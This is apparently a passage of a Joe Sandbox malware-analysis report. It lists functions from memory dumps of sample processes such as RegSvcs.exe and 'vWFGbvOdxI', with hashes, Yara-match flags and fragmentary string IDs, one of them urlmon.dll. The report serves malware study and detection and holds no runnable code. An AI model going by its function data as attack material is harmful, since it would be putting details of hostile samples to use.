                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$
                                                                          • API String ID: 3446177414-233714265
                                                                          • Opcode ID: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                                          • Instruction ID: 46b7f513879388b5c23f774fff998f194c8c7b17eaf4997bb01a722e9fec448e
                                                                          • Opcode Fuzzy Hash: 835699440ba51276da8710be0f8b677cb115011e4aefc25dc572d662eb84ad89
                                                                          • Instruction Fuzzy Hash: DE51F371E003469FEF2DDFE8E4887ADBBB2BF64B18F144059D5056B285DB70A945CB80
                                                                          Function 0119FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $
                                                                          • API String ID: 3446177414-3993045852
                                                                          • Opcode ID: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                                          • Instruction ID: 62b650e1ecb5f85f0f1018edc3a7cd3503af8c20e34e6e9453abcf665463ece6
                                                                          • Opcode Fuzzy Hash: 9c3689104d43efcd616fce36cd765e76318caca8a82b1bcc752e4f8a723771d4
                                                                          • Instruction Fuzzy Hash: B341BF75E0021AABDF1ADF99D884AEEBFB5FF48714F150019E920A7341C7709942CB90
                                                                          Function 0111DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2409004494.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.2409004494.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10f0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0$0
                                                                          • API String ID: 3446177414-203156872
                                                                          • Opcode ID: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                                          • Instruction ID: d32f5d0d6553264fe2e6a66849e14fcf1450f8b62f9e4ca70320c8880b6f9660
                                                                          • Opcode Fuzzy Hash: 29b9b2c351b0404955eac149b8e5488be8d2333553018f50cea352ead1dfaad1
                                                                          • Instruction Fuzzy Hash: E6417CB16087069FC715CF68D484A1ABBE4BF88718F04493EF988DB345D771EA06CB96

                                                                          Executed Functions

                                                                          Function 029E5B06 Relevance: 27.9, Strings: 22, Instructions: 445COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $#J$$$<]$=$?2$A$I$O$RH$X$Z=$\p$]$e$fP$g$ws$z${#$4$;
                                                                          • API String ID: 0-1685357701
                                                                          • Opcode ID: 7b8afc7e1087089fdd76c80a31368f98bbca0bf90f7143280b21b1f3a7d4e033
                                                                          • Instruction ID: 7f7994b757f61475a62f150e22ad09f7277d0fb580a4f859720df9a8cab56df6
                                                                          • Opcode Fuzzy Hash: 7b8afc7e1087089fdd76c80a31368f98bbca0bf90f7143280b21b1f3a7d4e033
                                                                          • Instruction Fuzzy Hash: 7F32C1B0D05228CBEF25CF89C8987DDBBB2FB95309F108599D10AAB381C7B55A85CF45
                                                                          Function 029F371C Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$O$S$\$s
                                                                          • API String ID: 0-3854637164
                                                                          • Opcode ID: aedcb172bcf1d272c6593fcfc82efabf1aca565fdd5d8fef47671a2227aa4118
                                                                          • Instruction ID: 156219990733968c4185f91f80699724dbbaa8d81b73b412a09ca5f6ae1aebe2
                                                                          • Opcode Fuzzy Hash: aedcb172bcf1d272c6593fcfc82efabf1aca565fdd5d8fef47671a2227aa4118
                                                                          • Instruction Fuzzy Hash: 4651A2B2914218ABDB90DF94EC84BEFB37CEB44714F044299EA0857140EB765A58CFA1
                                                                          Function 029DF1CD Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6f6b1d0da6ab478632e89d2586a1308685cdf90f8762d503cce0a881c5f1ea6
                                                                          • Instruction ID: 7864dde3f4df6fc5a40796cbb0b89204525b4bb8cd8a7e1a20316a16bbd3dc8b
                                                                          • Opcode Fuzzy Hash: d6f6b1d0da6ab478632e89d2586a1308685cdf90f8762d503cce0a881c5f1ea6
                                                                          • Instruction Fuzzy Hash: 5B317CB1A50219AFDB04CF95DC81EEEBBBCEF49710F10414AFA05E6240E7B196458BA4
                                                                          Function 02A0418C Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 209dafb16dc51e22dec11edd2e50a09a1ef8b5ae61b9c658171ecf046d4ebff5
                                                                          • Instruction ID: 2831c2378562c85d1d7859914de2b11bb36fdd975bc1c017de3e26508a50e961
                                                                          • Opcode Fuzzy Hash: 209dafb16dc51e22dec11edd2e50a09a1ef8b5ae61b9c658171ecf046d4ebff5
                                                                          • Instruction Fuzzy Hash: 3F31FCB5A40248AFDB14DF98DD85EEFB7B9EF88300F108119F919A7240D770A911CFA1
                                                                          Function 02A04AEC Relevance: .1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6974fb4f0529204329ad345bcf854dcbf0a57ebe356176fe14e29a8476b77d32
                                                                          • Instruction ID: 25fa5a245b485c8e68dbd49be0f1e93ea30deee14ee35b19f95e8271c7e6740f
                                                                          • Opcode Fuzzy Hash: 6974fb4f0529204329ad345bcf854dcbf0a57ebe356176fe14e29a8476b77d32
                                                                          • Instruction Fuzzy Hash: 78212CB5A41608AFDB14DF98DC85EAF77BDEF88310F104509F918AB280DB71A911CBA5
                                                                          Function 029F355C Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65062cd4a63c7f0541ad4e8922017e40cc60bf5b20270eab7ca5cd1bc3b7a366
                                                                          • Instruction ID: 830444fbbc74dfd1dd7cff264869b5c60671dce6114f6d2bd1584a78010b58e2
                                                                          • Opcode Fuzzy Hash: 65062cd4a63c7f0541ad4e8922017e40cc60bf5b20270eab7ca5cd1bc3b7a366
                                                                          • Instruction Fuzzy Hash: 2D115AB13C03057BF7209A559C83FAB776D9B89F54F244015FB08AE2C1D6B5B8154AB8
                                                                          Function 02A00A3C Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2479d296b99404069a9dea2c382727e7298d2a49910325e550ba3dc0d1a6bccc
                                                                          • Instruction ID: 4b2cd78d4db1d747bbb8cfc86b2e1cccca3c2d68e01bae2cc91d21dc66f2abd1
                                                                          • Opcode Fuzzy Hash: 2479d296b99404069a9dea2c382727e7298d2a49910325e550ba3dc0d1a6bccc
                                                                          • Instruction Fuzzy Hash: 5C21EDB6D0121CAF8B40DFA9D8419EFB7F9EF88210F14825BE909E7240E7705A058BA1
                                                                          Function 02A03E1C Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6013831a6e4d19f89a786911385c58dded79b15aae7d652d9208303fa71df454
                                                                          • Instruction ID: c36be8f98702ace6220b146dd9db171d8dca25b93c8a8e8eae922ed9c93f0e21
                                                                          • Opcode Fuzzy Hash: 6013831a6e4d19f89a786911385c58dded79b15aae7d652d9208303fa71df454
                                                                          • Instruction Fuzzy Hash: 07116371A413146FD714EF54DC45FEF77AEEB85710F004509F9186B280DB716911CBA5
                                                                          Function 02A03F9C Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 07ab84add6fa0af66309835b598b210b5a758b91fe5e0eecea84a8c2921bcc09
                                                                          • Instruction ID: 1b43c64f2c755d3f83f1af7881e6578fc6234b3fe4de62e0ade6e776af6f60d7
                                                                          • Opcode Fuzzy Hash: 07ab84add6fa0af66309835b598b210b5a758b91fe5e0eecea84a8c2921bcc09
                                                                          • Instruction Fuzzy Hash: 8D119071941358ABDB10EF68DC45FAF77AEEF85300F004549F918AB280DB716A10CBA5
                                                                          Function 02A01D7C Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2bd16ea96bd14051c135ad95ef1d875c22cfa745987d5aacd5671bca035edf3
                                                                          • Instruction ID: 2b526582c0fbb003dbd13b2d8a64d33b7aee886e9eff416c19644c481dfe086a
                                                                          • Opcode Fuzzy Hash: a2bd16ea96bd14051c135ad95ef1d875c22cfa745987d5aacd5671bca035edf3
                                                                          • Instruction Fuzzy Hash: 8B1130B6D01218AF8F00DFA9D9409EEBBF9EF88200F04456AE909E7200E7715A14CFE0
                                                                          Function 02A04E5C Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd0296cf9238abdedae7624c92a7e3debef023e4f7cc1ae673f7c9365dc304a1
                                                                          • Instruction ID: 20011c6a17d725161cd83751f2430f35570fd7c01bb40d08d9c69250b2a46e3a
                                                                          • Opcode Fuzzy Hash: cd0296cf9238abdedae7624c92a7e3debef023e4f7cc1ae673f7c9365dc304a1
                                                                          • Instruction Fuzzy Hash: FD0180B2204148BBCB44DE99DC90EDB77AEEF8C714F518508BA19E3281D630E8518BA4
                                                                          Function 029DF320 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: afca341003ab1de97139263508d2713726f8dc15a27a7bea218d32c293def8f7
                                                                          • Instruction ID: 2481eda87a944e01bb6e7a2205f04b15fd078525d65576aefb4c63865b6654ca
                                                                          • Opcode Fuzzy Hash: afca341003ab1de97139263508d2713726f8dc15a27a7bea218d32c293def8f7
                                                                          • Instruction Fuzzy Hash: 22F059B311430A3BD7105A9DAC81B86F7CCEB85374F250222FD1CC7341D635D45687A4
                                                                          Function 02A009AC Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f69b3c1b4b5bca7db472ca68c8ae4e76d765cf9fef4731b9fc5d96753ba0c31
                                                                          • Instruction ID: 9c34868919aeef4898c1d36ad593cbf04bc2f9b7417ae5cf92cd53f3a85fd016
                                                                          • Opcode Fuzzy Hash: 6f69b3c1b4b5bca7db472ca68c8ae4e76d765cf9fef4731b9fc5d96753ba0c31
                                                                          • Instruction Fuzzy Hash: EA01DBB6C1121DAECF40DFE9D9419EEBBF9BB48704F14416AD419F3200E77056048FA0
                                                                          Function 029DF1DD Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1fbb8b485bce4b6b56871e035a5452507e97e6a198564c7cac7dbbd0f6ab0da9
                                                                          • Instruction ID: 68aa5dc4c0672ca5f85d29a928b3196e51bdc152a5944098ca1ff1e9b5ed8dad
                                                                          • Opcode Fuzzy Hash: 1fbb8b485bce4b6b56871e035a5452507e97e6a198564c7cac7dbbd0f6ab0da9
                                                                          • Instruction Fuzzy Hash: EC0197B1C21229AF8B40CFADD88559DBBF8FB09720B10825BE928E7200D3B086418FD4
                                                                          Function 02A0409C Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bed6eace594d9ec31f3bd3840047e611ed2ad8a1ec29b2e0995f6650a35b4b4c
                                                                          • Instruction ID: a4d5300b4a9a9be15ebd54d24c9b3633180e2d536112453f919dbdbd180838b4
                                                                          • Opcode Fuzzy Hash: bed6eace594d9ec31f3bd3840047e611ed2ad8a1ec29b2e0995f6650a35b4b4c
                                                                          • Instruction Fuzzy Hash: EAF01C752402057FCB10EF99DC81EEB77ADEFC8750F004419F918A7241DA71B9518BB4
                                                                          Function 029F367C Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                          • Instruction ID: f2a0a1192fd7126586d83d38ec7462e86d4971655b8b4cf23923f9206e5f5101
                                                                          • Opcode Fuzzy Hash: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                          • Instruction Fuzzy Hash: 2DF0827181520CEBDF14CF64D881BDDBBB8EB04320F1047AAE925DB2C0D73497548B85
                                                                          Function 02A04D7C Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                          • Instruction ID: d0e93b4bbb6d6b2f07dfad7e10f48f7761101a50390538501eaa3487d908c6a5
                                                                          • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                          • Instruction Fuzzy Hash: 49E09271600204BBCA10EE98DC41FDB77ADEFC8710F004419F908A7281CA71BD21CBB4
                                                                          Function 02A06C0C Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 533d6df9babfdb0ff6a6b7e891abbb6bfa0d183f9dc91fc395d880453f9b4015
                                                                          • Instruction ID: db509e0ae8b80a1ecad68479b6a55296e4e2de03ff7afd6af6b276d017489d22
                                                                          • Opcode Fuzzy Hash: 533d6df9babfdb0ff6a6b7e891abbb6bfa0d183f9dc91fc395d880453f9b4015
                                                                          • Instruction Fuzzy Hash: B9E0863264021437D6249689AD86FA7776DDBC5F65F090064FF1C9B380EBB5AE1046E4
                                                                          Function 029F367A Relevance: .0, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4d583198d0d243c8480a217c6d1fff85b5c79485e71ab08f56ecc093c01adb8f
                                                                          • Instruction ID: 65913984a427fba76d70fb79b112d953245fa9b5da2a60852964e84aa478e8c5
                                                                          • Opcode Fuzzy Hash: 4d583198d0d243c8480a217c6d1fff85b5c79485e71ab08f56ecc093c01adb8f
                                                                          • Instruction Fuzzy Hash: 1FF06D7191520CABDB04CFA4E882B9DB7B8EB04320F1047AEFD19CB280D739D7558B85
                                                                          Function 02A04A5C Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                          • Instruction ID: 7fdbb2c0894cf077c5a99c591b4f2ae4a081c15dcbf8f7826fe9f95b81054940
                                                                          • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                          • Instruction Fuzzy Hash: 67E08C362402447BC620FB59EC40FDB776EEFC5710F004415FA08A7241CAB2BA158BF4

                                                                          Non-executed Functions

                                                                          Function 029FDF1C Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                          • API String ID: 0-1002149817
                                                                          • Opcode ID: deb004a8d5e432c4947d999c48f7b369e7e75ed19297bccaf22de3548bf3e1d5
                                                                          • Instruction ID: f6c768c06bf9579a3cc941b52643ec17cdb709a9553a6850ed72aec50bd78d63
                                                                          • Opcode Fuzzy Hash: deb004a8d5e432c4947d999c48f7b369e7e75ed19297bccaf22de3548bf3e1d5
                                                                          • Instruction Fuzzy Hash: FAC13DB1D003289EDB61DFA4DC44BEEBBB9AF49704F0041D9D60CA7241E7B54A88CFA5
                                                                          Function 029F655C Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • API String ID: 0-392141074
                                                                          • Opcode ID: 990217ce0401018a6af17ff6e43cf79953c7ae4a068bfb19ab0fa1fc947e639f
                                                                          • Instruction ID: c7c11ad00cea4f8d3d5e6cbae4d444293e98030a23cadcea8614ef67ef0b51f4
                                                                          • Opcode Fuzzy Hash: 990217ce0401018a6af17ff6e43cf79953c7ae4a068bfb19ab0fa1fc947e639f
                                                                          • Instruction Fuzzy Hash: F57120B1D50328AADB25DF94DC80FEEB7BDBF44B04F008199E519A6180EB725748CFA5
                                                                          Function 029F6553 Relevance: 16.4, Strings: 13, Instructions: 178COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                          • API String ID: 0-392141074
                                                                          • Opcode ID: d8829b9adf0338a44ecd680175c3f46a50c31f71780e2c973ca2db3f9698ff79
                                                                          • Instruction ID: e57573ce3888137cae150817266610e77a881b55f36c367fbda8c0f37a8f3def
                                                                          • Opcode Fuzzy Hash: d8829b9adf0338a44ecd680175c3f46a50c31f71780e2c973ca2db3f9698ff79
                                                                          • Instruction Fuzzy Hash: 07612EB1D50328AEDB15DF94DC80FEEBBBDAF44704F008199E519A6180EB725748CFA5
                                                                          Function 029EA195 Relevance: 13.8, Strings: 11, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                          • API String ID: 0-685823316
                                                                          • Opcode ID: 181136c166119264c0927b5b004dcbb8e14e8d3e3305e59b09621290c78564e9
                                                                          • Instruction ID: 5d3277fb650bb3890c5c1ccc61f9403aa9c122772e5ecdb50c6f9aa6a506bb00
                                                                          • Opcode Fuzzy Hash: 181136c166119264c0927b5b004dcbb8e14e8d3e3305e59b09621290c78564e9
                                                                          • Instruction Fuzzy Hash: 413193B1D50218AEEF40DF90DC85BEEBBB9BF48704F10815CE618BA180DBB516488FA4
                                                                          Function 029F166C Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                          • API String ID: 0-620024284
                                                                          • Opcode ID: 49dc649b778d942e576a3367a9604ab14fac31a96c7df220d6513a3de62b0dd4
                                                                          • Instruction ID: f5d57c5767c5d23cf428c07e4d3c80e3089b85ec5dccb3014d71710e19aa82b9
                                                                          • Opcode Fuzzy Hash: 49dc649b778d942e576a3367a9604ab14fac31a96c7df220d6513a3de62b0dd4
                                                                          • Instruction Fuzzy Hash: E341C7B1850218BADF21EFA0ED80FDE777DAF55704F008599A50DA7180EBF55B988FA0
                                                                          Function 029DEF89 Relevance: 10.1, Strings: 8, Instructions: 56COMMON
